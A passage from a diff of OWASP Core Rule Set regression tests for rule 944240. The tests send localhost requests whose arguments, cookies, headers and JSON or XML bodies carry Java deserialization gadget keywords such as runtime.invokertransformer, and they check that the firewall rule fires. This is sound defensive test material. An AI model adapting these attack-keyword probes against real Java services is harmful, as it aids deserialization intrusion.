"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 34 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 35 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 36 desc: "Cookie test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 37 desc: "Cookie name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 38 desc: "Request header test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 39 desc: "XML attribute value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 40 desc: "XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 41 desc: "Nested XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 42 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 45 desc: "Argument test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 46 desc: "Argument name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 47 desc: "Cookie test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 48 desc: "Cookie name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 49 desc: "Request header test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 50 desc: "XML attribute value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 51 desc: "XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 52 desc: "Nested XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 53 desc: "Content-Type text/plain includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.invokertransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 56 desc: "Argument test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 57 desc: "Argument name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log: + expect_ids: [944240] + - test_id: 58 desc: "Cookie test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 59 desc: "Cookie name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 